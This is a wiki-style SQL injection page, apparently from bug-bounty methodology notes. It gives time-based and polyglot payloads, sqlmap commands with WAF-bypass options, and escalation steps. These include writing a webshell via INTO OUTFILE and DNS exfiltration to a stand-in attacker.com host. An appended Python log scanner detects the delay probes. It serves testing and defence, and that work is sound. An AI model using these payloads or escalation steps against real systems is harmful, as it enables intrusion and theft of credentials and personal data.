====== SQL Injection ======

Legacy code and APIs are most vulnerable. Blind/time-based is the most common variant in the wild.

===== Detection =====

Time-based payloads work when error messages are disabled (the most common case):

<code>
' or sleep(15) and 1=1#
' or sleep(15)#
' union select sleep(15),null#
'%2Bbenchmark(3200,SHA1(1))%2B'
'+BENCHMARK(40000000,SHA1(1))+'
</code>

**Polyglot payload (jhaddix):**

<code>
"SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
</code>

===== Where to Test =====

  * Legacy features -- old code = no parameterized queries
  * Both GET and POST -- ''$_GET'' may be safe but ''$_POST'' not
  * Web services and APIs -- especially older REST/SOAP endpoints
  * Search boxes, filter parameters, ordering/sorting parameters
  * HTTP headers: ''User-Agent'', ''X-Forwarded-For'', ''Referer'' (logged to DB)

===== Automation =====

<code bash>
# Parse Burp logs directly
sqlmap -l burp.log --tamper=space2comment --batch

# Target specific URL
sqlmap -u "https://target.com/page?id=1" --dbs

# Bypass WAF blacklists
sqlmap -u "https://target.com/page?id=1" --tamper=space2comment,charunicodeencode
</code>

===== Escalation =====

  * Learn the database schema: ''INFORMATION_SCHEMA.TABLES''
  * Read sensitive data: credentials, API keys, PII
  * Write a webshell: ''INTO OUTFILE '/var/www/html/shell.php'''
  * OOB exfiltration when blind: DNS lookup via ''LOAD_FILE('//attacker.com/x')''

===== See Also =====

  * [[tbhm:06_sqli|TBHM SQLi]]
  * [[zseano:escalation|Bug Chaining]]
  * [[zseano:start|Methodology Index]]
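===== Defender Note: Spotting Time-Based Probes in Logs =====

The delay payloads under Detection are also the easiest SQLi probes to catch on the blue-team side, because the delay primitives (''SLEEP'', ''BENCHMARK'', ''pg_sleep'', ''WAITFOR DELAY'') have no legitimate reason to appear in a query string or a logged header. The following is an added example, not part of this page's original content or any tool it references: a small Python scanner over constructed access-log lines (the log format, field names and 5-second "slow" threshold are assumptions) that URL-decodes twice so the ''%2B'' / double-encoded payload shapes above are not missed, and checks the ''User-Agent'' as well as the URL since headers written to a database are a vector too.

```python
import re
from typing import Optional
from urllib.parse import unquote_plus

# Delay primitives an injection probe relies on (MySQL, PostgreSQL, MSSQL).
DELAY_FUNCS = re.compile(
    r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.IGNORECASE
)

# Assumed (constructed) log format: ip "METHOD url" status latency "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<url>\S+)" (?P<status>\d{3}) '
    r'(?P<ms>\d+)ms "(?P<ua>[^"]*)"$'
)

SLOW_MS = 5000  # assumed threshold: a delay probe that fired also looks slow


def normalise(value: str) -> str:
    """Decode URL encoding twice so double-encoded payloads are not missed."""
    return unquote_plus(unquote_plus(value))


def analyse_line(line: str) -> Optional[dict]:
    """Return a finding for a line carrying a delay probe, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    # Check the query string and the User-Agent header alike.
    where = [f for f in ("url", "ua")
             if DELAY_FUNCS.search(normalise(m.group(f)))]
    if not where:
        return None
    ms = int(m.group("ms"))
    return {"ip": m.group("ip"), "where": where,
            "latency_ms": ms, "slow": ms >= SLOW_MS}


def scan(lines) -> list:
    """Run analyse_line over log lines, keeping only the findings."""
    return [f for f in map(analyse_line, lines) if f]


# Constructed sample lines; the probes mirror the payload shapes listed above.
SAMPLE_LOG = [
    '10.0.0.5 "GET /page?id=1" 200 120ms "Mozilla/5.0"',
    '10.0.0.7 "GET /page?id=1%27%20or%20sleep(15)%23" 200 15010ms "Mozilla/5.0"',
    '10.0.0.7 "GET /page?id=1%2527%252Bbenchmark(3200,SHA1(1))%252B%2527" 200 4300ms "Mozilla/5.0"',
    '10.0.0.9 "GET /login" 200 200ms "\' or SLEEP(1)#"',
    '10.0.0.3 "GET /docs?q=sleeping+bags" 200 90ms "Mozilla/5.0"',  # benign
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The last sample line shows why the pattern requires an opening parenthesis: a search for "sleeping bags" must not page anyone.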